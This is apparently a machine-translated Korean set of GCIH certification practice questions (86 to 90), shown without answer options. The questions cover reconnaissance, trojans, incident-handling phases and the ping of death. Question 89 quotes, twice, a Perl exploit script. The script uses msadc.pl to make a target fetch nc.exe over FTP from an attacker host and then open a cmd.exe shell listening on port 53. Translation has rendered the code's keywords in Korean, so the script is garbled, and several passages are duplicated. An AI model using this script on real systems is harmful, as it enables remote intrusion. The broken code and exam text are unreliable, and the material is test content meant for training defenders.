GCIH 문제 86
다음 침투 테스트 단계 중 대상 네트워크를 매핑하는 데 도움이 되고 시스템에서 실행되는 운영 체제 및 애플리케이션에 관한 귀중한 정보를 제공하는 whois, DNS 및 네트워크 스캐닝에서 데이터를 수집하는 단계가 포함되어 있습니까?
GCIH 문제 87
당신은 친구의 컴퓨터에 연결하여 그 컴퓨터에서 트로이 목마를 실행하려고 합니다. 다음 중 작업을 수행하기 위해 어떤 도구를 사용하시겠습니까?
GCIH 문제 88
귀하는 Umbrella Inc.의 수석 마케팅 관리자로 일하고 있습니다. 귀하는 시스템의 일부 소프트웨어 응용 프로그램이 제대로 작동하지 않고 원격 데스크톱 세션에 액세스할 수 없다는 사실을 알게 되었습니다. 회사 네트워크에 악의적인 공격이 수행된 것으로 의심됩니다. 즉시 사고대응팀에 연락해 상황을 처리했고, 네트워크 관리자에게 오작동과 관련된 모든 정보를 요청했습니다. 네트워크 관리자는 이러한 모든 문제를 일으킨 네트워크의 보안을 검토하고 있다고 사고 대응팀에 알렸습니다. 사고 대응팀은 이번 사건이 사고가 아닌 통제된 사건이라고 발표했습니다.
다음 중 사고 대응팀이 수행한 사고 처리 프로세스 단계는 무엇입니까?
다음 중 사고 대응팀이 수행한 사고 처리 프로세스 단계는 무엇입니까?
GCIH 문제 89
악의적인 해커인 Adam은 다음과 같은 공격을 수행합니다.
############################################# ###
$ 포트 = 53;
# 포트 X에서 cmd.exe를 생성합니다.
$your = "192.168.1.1";# FTP 서버 89
$user = "익명";# 다음으로 로그인
$pass = '[email protected]';# 비밀번호
############################################# ###
$호스트 = $ARGV[0];
"시작 중...\n"을 인쇄합니다.
print "서버가 $your FTP 서버에서 nc.exe 파일을 다운로드합니다.\n"; system("perl msadc.pl -h $host - C \"echo open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl - h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get hack. html>>sasfile\""); system( "perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "서버가 다운로드 중입니다...
\N";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "다운로드가 완료되면 Enter 키를 누르세요.
...
(FTP 서버가 있음)\n";
$o=; "열기...\n"을 인쇄합니다.
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); "완료.\n"을 인쇄합니다; #system("텔넷 $호스트
$port"); 종료(0);
다음 중 위 익스플로잇으로 인해 예상되는 결과는 무엇입니까?
############################################# ###
$ 포트 = 53;
# 포트 X에서 cmd.exe를 생성합니다.
$your = "192.168.1.1";# FTP 서버 89
$user = "익명";# 다음으로 로그인
$pass = '[email protected]';# 비밀번호
############################################# ###
$호스트 = $ARGV[0];
"시작 중...\n"을 인쇄합니다.
print "서버가 $your FTP 서버에서 nc.exe 파일을 다운로드합니다.\n"; system("perl msadc.pl -h $host - C \"echo open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h
$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl - h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get hack. html>>sasfile\""); system( "perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "서버가 다운로드 중입니다...
\N";
system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "다운로드가 완료되면 Enter 키를 누르세요.
...
(FTP 서버가 있음)\n";
$o=; "열기...\n"을 인쇄합니다.
system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); "완료.\n"을 인쇄합니다; #system("텔넷 $호스트
$port"); 종료(0);
다음 중 위 익스플로잇으로 인해 예상되는 결과는 무엇입니까?
GCIH 문제 90
악의적인 해커인 Adam은 조각난 ICMP 패킷을 의도적으로 원격 대상으로 보냅니다. 이 ICMP의 전체 크기
일단 재구성된 패킷은 65,536바이트를 초과합니다. 위의 정보를 바탕으로 다음 중 어떤 유형의
Adam이 공격을 수행하려고 합니까?
일단 재구성된 패킷은 65,536바이트를 초과합니다. 위의 정보를 바탕으로 다음 중 어떤 유형의
Adam이 공격을 수행하려고 합니까?